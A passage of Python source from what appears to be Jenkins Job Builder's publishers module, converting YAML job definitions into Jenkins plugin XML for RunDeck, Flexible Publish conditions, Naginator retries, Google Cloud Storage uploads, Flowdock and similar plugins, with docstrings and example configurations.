if criteria not in hudson_model.THRESHOLDS:
raise JenkinsJobsException("criteria must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
wr_threshold = hudson_model.THRESHOLDS[
criteria]
XML.SubElement(th, "name").text = wr_threshold['name']
XML.SubElement(th, "ordinal").text = wr_threshold['ordinal']
XML.SubElement(th, "color").text = wr_threshold['color']
XML.SubElement(th, "completeBuild").text = str(
wr_threshold['complete']).lower()
condition = data.get('condition', 'equal-or-over')
if condition not in conditions:
raise JenkinsJobsException('condition must be one of: %s' %
", ".join(conditions))
XML.SubElement(p, 'thresholdStrategy').text = conditions[
condition]
XML.SubElement(p, 'onlyIfSCMChanges').text = str(
data.get('only-on-scm-change', False)).lower()
XML.SubElement(p, 'onlyIfLocalSCMChanges').text = str(
data.get('only-on-local-scm-change', False)).lower()
def rundeck(parser, xml_parent, data):
"""yaml: rundeck
Trigger a rundeck job when the build is complete.
Requires the Jenkins :jenkins-wiki:`RunDeck
Plugin <RunDeck+Plugin>`.
:arg str job-id: The RunDeck job identifier. (required)
This could be:
* ID example : "42"
* UUID example : "2027ce89-7924-4ecf-a963-30090ada834f"
* reference, in the format : "project:group/job"
:arg str options: List of options for the Rundeck job, in Java-Properties
format: key=value (default "")
:arg str node-filters: List of filters to optionally filter the nodes
included by the job. (default "")
:arg str tag: Used for on-demand job scheduling on rundeck: if a tag is
specified, the job will only execute if the given tag is present in the
SCM changelog. (default "")
:arg bool wait-for-rundeck: If true Jenkins will wait for the job to
complete, if false the job will be started and Jenkins will move on.
(default false)
:arg bool fail-the-build: If true a RunDeck job failure will cause the
Jenkins build to fail. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/rundeck001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/rundeck002.yaml
:language: yaml
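    An illustrative sketch (the job id and option values are placeholders):

    .. code-block:: yaml

        publishers:
          - rundeck:
              # illustrative placeholder values only
              job-id: 'project:group/job'
              options: 'version=${BUILD_NUMBER}'
              wait-for-rundeck: true
              fail-the-build: true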
"""
p = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.rundeck.RundeckNotifier')
mappings = [
('job-id', 'jobId', None),
('options', 'options', ''),
('node-filters', 'nodeFilters', ''),
('tag', 'tag', ''),
('wait-for-rundeck', 'shouldWaitForRundeckJob', False),
('fail-the-build', 'shouldFailTheBuild', False),
]
helpers.convert_mapping_to_xml(p, data, mappings, fail_required=True)
def create_publishers(parser, action):
dummy_parent = XML.Element("dummy")
parser.registry.dispatch('publisher', parser, dummy_parent, action)
return list(dummy_parent)
def conditional_publisher(parser, xml_parent, data):
"""yaml: conditional-publisher
Conditionally execute some post-build steps. Requires the Jenkins
:jenkins-wiki:`Flexible Publish Plugin <Flexible+Publish+Plugin>`.
A Flexible Publish list of Conditional Actions is created in Jenkins.
:arg str condition-kind: Condition kind that must be verified before the
action is executed. Valid values and their additional attributes are
described in the conditions_ table.
:arg str on-evaluation-failure: What should be the outcome of the build
if the evaluation of the condition fails. Possible values are `fail`,
`mark-unstable`, `run-and-mark-unstable`, `run` and `dont-run`.
Default is `fail`.
:arg list action: Action to run if the condition is verified. Item
can be any publisher known by Jenkins Job Builder and supported
by the Flexible Publish Plugin.
.. _conditions:
================== ====================================================
Condition kind Description
================== ====================================================
always Condition is always verified
never Condition is never verified
boolean-expression Run the action if the expression expands to a
representation of true
:condition-expression: Expression to expand
current-status Run the action if the current build status is
within the configured range
:condition-worst: Accepted values are SUCCESS,
UNSTABLE, FAILURE, NOT_BUILD, ABORTED
:condition-best: Accepted values are SUCCESS,
UNSTABLE, FAILURE, NOT_BUILD, ABORTED
shell Run the action if the shell command succeeds
:condition-command: Shell command to execute
windows-shell Similar to shell, except that commands will be
executed by cmd, under Windows
:condition-command: Command to execute
regexp Run the action if a regular expression matches
:condition-expression: Regular Expression
:condition-searchtext: Text to match against
the regular expression
file-exists Run the action if a file exists
:condition-filename: Check existence of this file
:condition-basedir: If condition-filename is
relative, it will be considered relative to
either `workspace`, `artifact-directory`,
or `jenkins-home`. Default is `workspace`.
================== ====================================================
Single Conditional Action Example:
.. literalinclude:: \
/../../tests/publishers/fixtures/conditional-publisher001.yaml
:language: yaml
Multiple Conditional Actions Example
(includes example of multiple actions per condition which requires
v0.13 or higher of the Flexible Publish plugin):
.. literalinclude:: \
/../../tests/publishers/fixtures/conditional-publisher003.yaml
:language: yaml
:download:`Multiple Conditional Actions Example for pre-v0.13 versions
<../../tests/publishers/fixtures/conditional-publisher002.yaml>`
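    An illustrative sketch of a single conditional action; the nested
    ``archive`` publisher and file names are placeholders for any publisher
    supported by the Flexible Publish plugin:

    .. code-block:: yaml

        publishers:
          - conditional-publisher:
              # illustrative placeholder values only
              - condition-kind: file-exists
                condition-filename: output.tar.gz
                condition-basedir: workspace
                on-evaluation-failure: dont-run
                action:
                  - archive:
                      artifacts: 'output.tar.gz'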
"""
def publish_condition(cdata):
kind = cdata['condition-kind']
ctag = XML.SubElement(cond_publisher, condition_tag)
class_pkg = 'org.jenkins_ci.plugins.run_condition'
if kind == "always":
ctag.set('class',
class_pkg + '.core.AlwaysRun')
elif kind == "never":
ctag.set('class',
class_pkg + '.core.NeverRun')
elif kind == "boolean-expression":
ctag.set('class',
class_pkg + '.core.BooleanCondition')
XML.SubElement(ctag, "token").text = cdata['condition-expression']
elif kind == "current-status":
ctag.set('class',
class_pkg + '.core.StatusCondition')
wr = XML.SubElement(ctag, 'worstResult')
wr_name = cdata['condition-worst']
if wr_name not in hudson_model.THRESHOLDS:
raise JenkinsJobsException(
"threshold must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
wr_threshold = hudson_model.THRESHOLDS[wr_name]
XML.SubElement(wr, "name").text = wr_threshold['name']
XML.SubElement(wr, "ordinal").text = wr_threshold['ordinal']
XML.SubElement(wr, "color").text = wr_threshold['color']
XML.SubElement(wr, "completeBuild").text = \
str(wr_threshold['complete']).lower()
br = XML.SubElement(ctag, 'bestResult')
br_name = cdata['condition-best']
if br_name not in hudson_model.THRESHOLDS:
raise JenkinsJobsException(
"threshold must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
br_threshold = hudson_model.THRESHOLDS[br_name]
XML.SubElement(br, "name").text = br_threshold['name']
XML.SubElement(br, "ordinal").text = br_threshold['ordinal']
XML.SubElement(br, "color").text = br_threshold['color']
            XML.SubElement(br, "completeBuild").text = \
                str(br_threshold['complete']).lower()
elif kind == "shell":
ctag.set('class',
class_pkg + '.contributed.ShellCondition')
XML.SubElement(ctag, "command").text = cdata['condition-command']
elif kind == "windows-shell":
ctag.set('class',
class_pkg + '.contributed.BatchFileCondition')
XML.SubElement(ctag, "command").text = cdata['condition-command']
elif kind == "regexp":
ctag.set('class',
class_pkg + '.core.ExpressionCondition')
XML.SubElement(ctag,
"expression").text = cdata['condition-expression']
XML.SubElement(ctag, "label").text = cdata['condition-searchtext']
elif kind == "file-exists":
ctag.set('class',
class_pkg + '.core.FileExistsCondition')
XML.SubElement(ctag, "file").text = cdata['condition-filename']
basedir = cdata.get('condition-basedir', 'workspace')
basedir_tag = XML.SubElement(ctag, "baseDir")
if "workspace" == basedir:
basedir_tag.set('class',
class_pkg + '.common.BaseDirectory$Workspace')
elif "artifact-directory" == basedir:
basedir_tag.set('class',
class_pkg + '.common.'
'BaseDirectory$ArtifactsDir')
elif "jenkins-home" == basedir:
basedir_tag.set('class',
class_pkg + '.common.'
'BaseDirectory$JenkinsHome')
else:
raise JenkinsJobsException('%s is not a valid condition-kind '
'value.' % kind)
def publish_action(parent, action):
for edited_node in create_publishers(parser, action):
if not use_publisher_list:
edited_node.set('class', edited_node.tag)
edited_node.tag = 'publisher'
parent.append(edited_node)
flex_publisher_tag = 'org.jenkins__ci.plugins.flexible__publish.' \
'FlexiblePublisher'
cond_publisher_tag = 'org.jenkins__ci.plugins.flexible__publish.' \
'ConditionalPublisher'
root_tag = XML.SubElement(xml_parent, flex_publisher_tag)
publishers_tag = XML.SubElement(root_tag, "publishers")
condition_tag = "condition"
evaluation_classes_pkg = 'org.jenkins_ci.plugins.run_condition'
evaluation_classes = {
'fail': evaluation_classes_pkg + '.BuildStepRunner$Fail',
'mark-unstable': evaluation_classes_pkg +
'.BuildStepRunner$Unstable',
'run-and-mark-unstable': evaluation_classes_pkg +
'.BuildStepRunner$RunUnstable',
'run': evaluation_classes_pkg + '.BuildStepRunner$Run',
'dont-run': evaluation_classes_pkg + '.BuildStepRunner$DontRun',
}
for cond_action in data:
cond_publisher = XML.SubElement(publishers_tag, cond_publisher_tag)
publish_condition(cond_action)
evaluation_flag = cond_action.get('on-evaluation-failure', 'fail')
if evaluation_flag not in evaluation_classes.keys():
raise JenkinsJobsException('on-evaluation-failure value '
'specified is not valid. Must be one '
'of: %s' % evaluation_classes.keys())
evaluation_class = evaluation_classes[evaluation_flag]
XML.SubElement(cond_publisher, "runner").set('class',
evaluation_class)
if 'action' in cond_action:
actions = cond_action['action']
action_parent = cond_publisher
plugin_info = \
parser.registry.get_plugin_info("Flexible Publish Plugin")
version = pkg_resources.parse_version(plugin_info.get('version',
'0'))
# XML tag changed from publisher to publisherList in v0.13
# check the plugin version to determine further operations
use_publisher_list = version >= pkg_resources.parse_version("0.13")
if use_publisher_list:
action_parent = XML.SubElement(cond_publisher, 'publisherList')
else:
# Check the length of actions list for versions prior to 0.13.
# Flexible Publish will overwrite action if more than one is
# specified. Limit the action list to one element.
                if len(actions) != 1:
raise JenkinsJobsException("Only one action may be "
"specified for each condition.")
for action in actions:
publish_action(action_parent, action)
else:
raise JenkinsJobsException('action must be set for each condition')
def scoverage(parser, xml_parent, data):
"""yaml: scoverage
Publish scoverage results as a trend graph.
Requires the Jenkins :jenkins-wiki:`Scoverage Plugin <Scoverage+Plugin>`.
    :arg str report-directory: Directory in which the xml scoverage report is
        generated (required)
    :arg str report-file: File name of the xml scoverage report (required)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/scoverage001.yaml
:language: yaml
"""
scoverage = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.scoverage.ScoveragePublisher')
scoverage.set('plugin', 'scoverage')
mappings = [
('report-directory', 'reportDir', None),
('report-file', 'reportFile', None),
]
helpers.convert_mapping_to_xml(
scoverage, data, mappings, fail_required=True)
def display_upstream_changes(parser, xml_parent, data):
"""yaml: display-upstream-changes
Display SCM changes of upstream jobs. Requires the Jenkins
:jenkins-wiki:`Display Upstream Changes Plugin
<Display+Upstream+Changes+Plugin>`.
Example:
.. literalinclude:: \
/../../tests/publishers/fixtures/display-upstream-changes.yaml
"""
XML.SubElement(
xml_parent,
'jenkins.plugins.displayupstreamchanges.'
'DisplayUpstreamChangesRecorder')
def gatling(parser, xml_parent, data):
"""yaml: gatling
Publish gatling results as a trend graph
Requires the Jenkins :jenkins-wiki:`Gatling Plugin <Gatling+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/gatling001.yaml
:language: yaml
"""
gatling = XML.SubElement(
xml_parent,
'io.gatling.jenkins.GatlingPublisher')
XML.SubElement(gatling, 'enabled').text = 'true'
def logstash(parser, xml_parent, data):
"""yaml: logstash
    Send job's console log to Logstash for processing and analysis of
    your job data. Also stores test metrics from JUnit.
Requires the Jenkins :jenkins-wiki:`Logstash Plugin <Logstash+Plugin>`.
    :arg num max-lines: The maximum number of log lines to send to Logstash.
        (default 1000)
    :arg bool fail-build: Mark build as failed if this step fails.
        (default false)
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/logstash-min.yaml
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/logstash-full.yaml
"""
logstash = XML.SubElement(xml_parent,
'jenkins.plugins.logstash.LogstashNotifier')
XML.SubElement(logstash, 'maxLines').text = str(
data.get('max-lines', 1000))
XML.SubElement(logstash, 'failBuild').text = str(
data.get('fail-build', False))
def image_gallery(parser, xml_parent, data):
"""yaml: image-gallery
    Produce an image gallery using a JavaScript library. Requires the Jenkins
    :jenkins-wiki:`Image Gallery Plugin <Image+Gallery+Plugin>`.
:arg str gallery-type:
:gallery-type values:
* **archived-images-gallery** (default)
* **in-folder-comparative-gallery**
* **multiple-folder-comparative-gallery**
:arg str title: gallery title (optional)
:arg int image-width: width of the image (optional)
:arg bool unstable-if-no-artifacts: mark build as unstable
if no archived artifacts were found (default false)
:arg str includes: include pattern (valid for archived-images-gallery
gallery)
:arg str base-root-folder: base root dir (valid for comparative gallery)
:arg int image-inner-width: width of the image displayed in the inner
gallery popup (valid for comparative gallery, optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/image-gallery001.yaml
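    An illustrative sketch (title and include pattern are placeholders):

    .. code-block:: yaml

        publishers:
          - image-gallery:
              # illustrative placeholder values only
              - gallery-type: archived-images-gallery
                title: Screenshots
                includes: 'screenshots/*.png'
                image-width: 400
                unstable-if-no-artifacts: true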
"""
def include_comparative_elements(gallery_parent_elem, gallery):
XML.SubElement(gallery_parent_elem, 'baseRootFolder').text = str(
gallery.get('base-root-folder', ''))
image_inner_width = gallery.get('image-inner-width', '')
if image_inner_width:
XML.SubElement(gallery_parent_elem, 'imageInnerWidth').text = str(
image_inner_width)
package_prefix = 'org.jenkinsci.plugins.imagegallery.'
builder = XML.SubElement(
xml_parent, package_prefix + 'ImageGalleryRecorder'
)
image_galleries = XML.SubElement(builder, 'imageGalleries')
galleries = {
'archived-images-gallery': package_prefix + 'imagegallery.'
'ArchivedImagesGallery',
'in-folder-comparative-gallery': package_prefix + 'comparative.'
'InFolderComparativeArchivedImagesGallery',
'multiple-folder-comparative-gallery': package_prefix + 'comparative.'
'MultipleFolderComparativeArchivedImagesGallery'
}
for gallery_def in data:
gallery_type = gallery_def.get('gallery-type',
'archived-images-gallery')
if gallery_type not in galleries:
raise InvalidAttributeError('gallery-type', gallery_type,
galleries.keys())
gallery_config = XML.SubElement(
image_galleries, galleries[gallery_type])
XML.SubElement(gallery_config, 'title').text = str(
gallery_def.get('title', ''))
image_width = str(gallery_def.get('image-width', ''))
if image_width:
XML.SubElement(gallery_config, 'imageWidth').text = str(
image_width)
XML.SubElement(
gallery_config,
'markBuildAsUnstableIfNoArchivesFound').text = str(gallery_def.get(
'unstable-if-no-artifacts', False))
if gallery_type == 'archived-images-gallery':
XML.SubElement(gallery_config, 'includes').text = str(
gallery_def.get('includes', ''))
if gallery_type == 'in-folder-comparative-gallery':
include_comparative_elements(gallery_config, gallery_def)
if gallery_type == 'multiple-folder-comparative-gallery':
include_comparative_elements(gallery_config, gallery_def)
def naginator(parser, xml_parent, data):
"""yaml: naginator
Automatically reschedule a build after a build failure
Requires the Jenkins :jenkins-wiki:`Naginator Plugin <Naginator+Plugin>`.
:arg bool rerun-unstable-builds: Rerun build for unstable builds as well
as failures (default false)
:arg bool rerun-matrix-part: Rerun build only for failed parts on the
matrix (>=1.12) (default false)
    :arg int fixed-delay: Fixed delay before retrying build (cannot be used
        with progressive-delay-increment or progressive-delay-maximum;
        this is the default delay type). (default 0)
:arg int progressive-delay-increment: Progressive delay before retrying
build increment (cannot be used when fixed-delay is being used)
(default 0)
:arg int progressive-delay-maximum: Progressive delay before retrying
maximum delay (cannot be used when fixed-delay is being used)
(default 0)
:arg int max-failed-builds: Maximum number of successive failed builds
(default 0)
:arg str regular-expression: Only rerun build if regular expression is
found in output (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/naginator001.yaml
:language: yaml
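    An illustrative sketch using a progressive delay (numbers are
    placeholders):

    .. code-block:: yaml

        publishers:
          - naginator:
              # illustrative placeholder values only
              rerun-unstable-builds: true
              progressive-delay-increment: 300
              progressive-delay-maximum: 3600
              max-failed-builds: 3
              regular-expression: 'Connection timed out'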
"""
naginator = XML.SubElement(
xml_parent,
'com.chikli.hudson.plugin.naginator.NaginatorPublisher')
XML.SubElement(naginator, 'regexpForRerun').text = str(
data.get('regular-expression', ''))
XML.SubElement(naginator, 'checkRegexp').text = str(
'regular-expression' in data).lower()
XML.SubElement(naginator, 'rerunIfUnstable').text = str(
data.get('rerun-unstable-builds', False)).lower()
XML.SubElement(naginator, 'rerunMatrixPart').text = str(
data.get('rerun-matrix-part', False)).lower()
progressive_delay = ('progressive-delay-increment' in data or
'progressive-delay-maximum' in data)
if 'fixed-delay' in data and progressive_delay:
raise JenkinsJobsException("You cannot specify both fixed "
"and progressive delays")
if not progressive_delay:
delay = XML.SubElement(
naginator,
'delay',
{'class': 'com.chikli.hudson.plugin.naginator.FixedDelay'})
XML.SubElement(delay, 'delay').text = str(
data.get('fixed-delay', '0'))
else:
delay = XML.SubElement(
naginator,
'delay',
{'class': 'com.chikli.hudson.plugin.naginator.ProgressiveDelay'})
XML.SubElement(delay, 'increment').text = str(
data.get('progressive-delay-increment', '0'))
XML.SubElement(delay, 'max').text = str(
data.get('progressive-delay-maximum', '0'))
XML.SubElement(naginator, 'maxSchedule').text = str(
data.get('max-failed-builds', '0'))
def disable_failed_job(parser, xml_parent, data):
"""yaml: disable-failed-job
Automatically disable failed jobs.
Requires the Jenkins :jenkins-wiki:`Disable Failed Job Plugin
<Disable+Failed+Job+Plugin>`.
:arg str when-to-disable: The condition to disable the job. (required)
Possible values are
* **Only Failure**
* **Failure and Unstable**
        * **Only Unstable**
:arg int no-of-failures: Number of consecutive failures to disable the
job. (optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/disable-failed-job001.yaml
:language: yaml
"""
xml_element = XML.SubElement(xml_parent, 'disableFailedJob.'
'disableFailedJob.DisableFailedJob',
{'plugin': 'disable-failed-job'})
valid_conditions = ['Only Failure',
'Failure and Unstable',
'Only Unstable']
try:
disable_condition = str(data['when-to-disable'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
if disable_condition not in valid_conditions:
raise InvalidAttributeError('when-to-disable', disable_condition,
valid_conditions)
XML.SubElement(xml_element, 'whenDisable').text = disable_condition
if 'no-of-failures' in data:
XML.SubElement(xml_element, 'failureTimes').text = str(data.get(
'no-of-failures'))
XML.SubElement(xml_element, 'optionalBrockChecked').text = 'true'
else:
XML.SubElement(xml_element, 'optionalBrockChecked').text = 'false'
def google_cloud_storage(parser, xml_parent, data):
"""yaml: google-cloud-storage
Upload build artifacts to Google Cloud Storage. Requires the
Jenkins :jenkins-wiki:`Google Cloud Storage plugin
<Google+Cloud+Storage+Plugin>`.
    Apart from the Google Cloud Storage Plugin itself, this requires the
    Google OAuth Credentials plugin to be installed and the required
    credentials to be added to Jenkins.
:arg str credentials-id: The set of Google credentials registered with
the Jenkins Credential Manager for authenticating
with your project. (required)
:arg list uploads:
:uploads:
* **expiring-elements** (`dict`)
:params:
* **bucket-name** (`str`) bucket name to upload artifacts
(required)
* **days-to-retain** (`int`) days to keep artifacts
(required)
* **build-log** (`dict`)
:params:
                    * **log-name** (`str`) name to give the file that will
                      contain the Jenkins console log (required)
* **storage-location** (`str`) bucket name to upload
artifacts (required)
                    * **share-publicly** (`bool`) whether to share uploaded
                      artifacts with everyone (default false)
* **upload-for-failed-jobs** (`bool`) whether to upload
artifacts even if the build fails (default false)
* **show-inline** (`bool`) whether to show uploaded build
log inline in web browsers, rather than forcing it to be
downloaded (default true)
* **strip-prefix** (`str`) strip this prefix off the
file names (default not set)
* **classic** (`dict`)
:params:
* **file-pattern** (`str`) ant style globs to match the
files to upload (required)
* **storage-location** (`str`) bucket name to upload
artifacts (required)
                    * **share-publicly** (`bool`) whether to share uploaded
                      artifacts with everyone (default false)
* **upload-for-failed-jobs** (`bool`) whether to upload
artifacts even if the build fails (default false)
* **show-inline** (`bool`) whether to show uploaded
artifacts inline in web browsers, rather than forcing
them to be downloaded (default false)
* **strip-prefix** (`str`) strip this prefix off the
file names (default not set)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/google_cloud_storage001.yaml
:language: yaml
Full example:
.. literalinclude::
/../../tests/publishers/fixtures/google_cloud_storage002.yaml
:language: yaml
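    An illustrative sketch (the credentials id and bucket names are
    placeholders):

    .. code-block:: yaml

        publishers:
          - google-cloud-storage:
              # illustrative placeholder values only
              credentials-id: my-gcs-credentials
              uploads:
                - build-log:
                    log-name: console.log
                    storage-location: my-bucket
                    upload-for-failed-jobs: true
                - classic:
                    file-pattern: 'dist/**'
                    storage-location: my-bucket
                    strip-prefix: 'dist/'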
"""
def expiring_elements(properties, upload_element, types):
"""Handle expiring elements upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.'
'jenkins.plugins.storage.'
'ExpiringBucketLifecycleManager')
if 'bucket-name' not in properties:
raise MissingAttributeError('bucket-name')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['bucket-name'])
XML.SubElement(xml_element, 'sharedPublicly').text = 'false'
XML.SubElement(xml_element, 'forFailedJobs').text = 'false'
if types.count('expiring-elements') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.ExpiringBucketLifecycleManager/module'})
else:
XML.SubElement(xml_element, 'module')
if 'days-to-retain' not in properties:
raise MissingAttributeError('days-to-retain')
XML.SubElement(xml_element, 'bucketObjectTTL').text = str(
properties['days-to-retain'])
def build_log(properties, upload_element, types):
"""Handle build log upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.jenkins.'
'plugins.storage.StdoutUpload')
if 'storage-location' not in properties:
raise MissingAttributeError('storage-location')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['storage-location'])
XML.SubElement(xml_element, 'sharedPublicly').text = str(
properties.get('share-publicly', False)).lower()
XML.SubElement(xml_element, 'forFailedJobs').text = str(
properties.get('upload-for-failed-jobs', False)).lower()
XML.SubElement(xml_element, 'showInline').text = str(
properties.get('show-inline', True)).lower()
XML.SubElement(xml_element, 'pathPrefix').text = str(
properties.get('strip-prefix', ''))
if types.count('build-log') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.StdoutUpload/module'})
else:
XML.SubElement(xml_element, 'module')
if 'log-name' not in properties:
raise MissingAttributeError('log-name')
XML.SubElement(xml_element, 'logName').text = str(
properties['log-name'])
def classic(properties, upload_element, types):
"""Handle classic upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.jenkins.'
'plugins.storage.ClassicUpload')
if 'storage-location' not in properties:
raise MissingAttributeError('storage-location')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['storage-location'])
XML.SubElement(xml_element, 'sharedPublicly').text = str(
properties.get('share-publicly', False)).lower()
XML.SubElement(xml_element, 'forFailedJobs').text = str(
properties.get('upload-for-failed-jobs', False)).lower()
XML.SubElement(xml_element, 'showInline').text = str(
properties.get('show-inline', False)).lower()
XML.SubElement(xml_element, 'pathPrefix').text = str(
properties.get('strip-prefix', ''))
if types.count('classic') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.ClassicUpload/module'})
else:
XML.SubElement(xml_element, 'module')
if 'file-pattern' not in properties:
raise MissingAttributeError('file-pattern')
XML.SubElement(xml_element, 'sourceGlobWithVars').text = str(
properties['file-pattern'])
uploader = XML.SubElement(xml_parent,
'com.google.jenkins.plugins.storage.'
'GoogleCloudStorageUploader',
{'plugin': 'google-storage-plugin'})
try:
credentials_id = str(data['credentials-id'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
XML.SubElement(uploader, 'credentialsId').text = credentials_id
valid_upload_types = ['expiring-elements',
'build-log',
'classic']
types = []
upload_element = XML.SubElement(uploader, 'uploads')
uploads = data['uploads']
for upload in uploads:
for upload_type, properties in upload.items():
types.append(upload_type)
if upload_type not in valid_upload_types:
raise InvalidAttributeError('uploads', upload_type,
valid_upload_types)
else:
locals()[upload_type.replace('-', '_')](
properties, upload_element, types)
def flowdock(parser, xml_parent, data):
"""yaml: flowdock
This plugin publishes job build results to a Flowdock flow.
Requires the Jenkins :jenkins-wiki:`Flowdock Plugin
<Flowdock+Plugin>`.
:arg str token: API token for the targeted flow.
(required)
    :arg str tags: Comma-separated list of tags to include in message
(default "")
:arg bool chat-notification: Send chat notification when build fails
(default true)
:arg bool notify-success: Send notification on build success
(default true)
:arg bool notify-failure: Send notification on build failure
(default true)
:arg bool notify-fixed: Send notification when build is fixed
(default true)
:arg bool notify-unstable: Send notification when build is unstable
(default false)
:arg bool notify-aborted: Send notification when build was aborted
(default false)
:arg bool notify-notbuilt: Send notification when build did not occur
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/flowdock001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/flowdock002.yaml
:language: yaml
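    An illustrative sketch (the token is a placeholder):

    .. code-block:: yaml

        publishers:
          - flowdock:
              # illustrative placeholder values only
              token: 0123456789abcdef
              tags: jenkins,ci
              notify-unstable: true
              notify-aborted: true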
"""
def gen_notification_entry(data_item, default, text):
e = XML.SubElement(nm, 'entry')
XML.SubElement(e, 'com.flowdock.jenkins.BuildResult').text = text
XML.SubElement(e, 'boolean').text = str(
data.get(data_item, default)).lower()
def gen_setting(item, default):
XML.SubElement(parent, 'notify%s' % item).text = str(
data.get('notify-%s' % item.lower(), default)).lower()
# Raise exception if token was not specified
if 'token' not in data:
raise MissingAttributeError('token')
parent = XML.SubElement(xml_parent,
'com.flowdock.jenkins.FlowdockNotifier')
XML.SubElement(parent, 'flowToken').text = data['token']
XML.SubElement(parent, 'notificationTags').text = data.get('tags', '')
XML.SubElement(parent, 'chatNotification').text = str(
data.get('chat-notification', True)).lower()
nm = XML.SubElement(parent, 'notifyMap')
# notification entries
gen_notification_entry('notify-success', True, 'SUCCESS')
gen_notification_entry('notify-failure', True, 'FAILURE')
gen_notification_entry('notify-fixed', True, 'FIXED')
gen_notification_entry('notify-unstable', False, 'UNSTABLE')
gen_notification_entry('notify-aborted', False, 'ABORTED')
gen_notification_entry('notify-notbuilt', False, 'NOT_BUILT')
# notification settings
gen_setting('Success', True)
gen_setting('Failure', True)
gen_setting('Fixed', True)
gen_setting('Unstable', False)
gen_setting('Aborted', False)
gen_setting('NotBuilt', False)
def clamav(parser, xml_parent, data):
"""yaml: clamav
Check files with ClamAV, an open source antivirus engine.
Requires the Jenkins :jenkins-wiki:`ClamAV Plugin <ClamAV+Plugin>`.
:arg str includes: Files that should be scanned.
(default "")
:arg str excludes: Files that should be ignored.
(default "")
Example:
.. literalinclude:: /../../tests/publishers/fixtures/clamav001.yaml
:language: yaml
"""
clamav = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.clamav.ClamAvRecorder')
XML.SubElement(clamav, 'includes').text = str(
data.get('includes', ''))
XML.SubElement(clamav, 'excludes').text = str(
data.get('excludes', ''))
def testselector(parser, xml_parent, data):
"""yaml: testselector
This plugin allows you to choose specific tests you want to run.
Requires the Jenkins :jenkins-wiki:`Tests Selector Plugin
<Tests+Selector+Plugin>`.
:arg str name: Environment variable in which selected tests are saved
(required)
:arg str description: Description
(default "")
:arg str properties-file: Contain all your tests
(required)
    :arg str enable-field: Field that indicates whether the test is enabled
        (default "")
    :arg str groupby: Field to group the tests by
        (default "")
    :arg str field-separator: Separator between the fields in the tests tree
        (default "")
    :arg str show-fields: Fields shown in the tests tree
        (default "")
    :arg str multiplicity-field: Number of times the test should run
        (default "")
Example:
.. literalinclude:: /../../tests/publishers/fixtures/testselector001.yaml
:language: yaml
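    An illustrative sketch (the variable name, file path and field names are
    placeholders):

    .. code-block:: yaml

        publishers:
          - testselector:
              # illustrative placeholder values only
              name: SELECTED_TESTS
              properties-file: tests/all-tests.properties
              enable-field: enabled
              groupby: feature
              field-separator: ';'
              show-fields: 'name;owner'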
"""
testselector = XML.SubElement(xml_parent, 'il.ac.technion.jenkins.plugins'
'TestExecuter')
try:
name = str(data['name'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
try:
propertiesfile = str(data['properties-file'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
XML.SubElement(testselector, 'name').text = name
XML.SubElement(testselector, 'description').text = data.get(
'description', '')
XML.SubElement(testselector, 'propertiesFilePath').text = propertiesfile
XML.SubElement(testselector, 'enableField').text = data.get(
'enable-field', '')
XML.SubElement(testselector, 'groupBy').text = data.get(
'groupby', '')
XML.SubElement(testselector, 'fieldSeparator').text = data.get(
'field-separator', '')
XML.SubElement(testselector, 'showFields').text = data.get(
'show-fields', '')
XML.SubElement(testselector, 'multiplicityField').text = data.get(
'multiplicity-field', '')
def cloudformation(parser, xml_parent, data):
"""yaml: cloudformation
Create cloudformation stacks before running a build and optionally
delete them at the end. Requires the Jenkins :jenkins-wiki:`AWS
Cloudformation Plugin <AWS+Cloudformation+Plugin>`.
:arg list create-stacks: List of stacks to create
:create-stacks attributes:
* **arg str name** - The name of the stack (Required)
* **arg str description** - Description of the stack (Optional)
* **arg str recipe** - The cloudformation recipe file (Required)
* **arg list parameters** - A list of key/value pairs, will be
joined together into a comma separated string (Optional)
* **arg int timeout** - Number of seconds to wait before giving up
creating a stack (default 0)
* **arg str access-key** - The Amazon API Access Key (Required)
* **arg str secret-key** - The Amazon API Secret Key (Required)
* **arg int sleep** - Number of seconds to wait before continuing
to the next step (default 0)
* **arg array region** - The region to run cloudformation in.
(Required)
:region values:
* **us-east-1**
* **us-west-1**
* **us-west-2**
* **eu-central-1**
* **eu-west-1**
* **ap-southeast-1**
* **ap-southeast-2**
* **ap-northeast-1**
* **sa-east-1**
:arg list delete-stacks: List of stacks to delete
:delete-stacks attributes:
* **arg list name** - The names of the stacks to delete (Required)
* **arg str access-key** - The Amazon API Access Key (Required)
* **arg str secret-key** - The Amazon API Secret Key (Required)
            * **arg bool prefix** - If selected the tear down process will look
              for the stack that starts with the stack name and has the oldest
              creation date, and will delete it. (default false)
* **arg array region** - The region to run cloudformation in.
(Required)
:region values:
* **us-east-1**
* **us-west-1**
* **us-west-2**
* **eu-central-1**
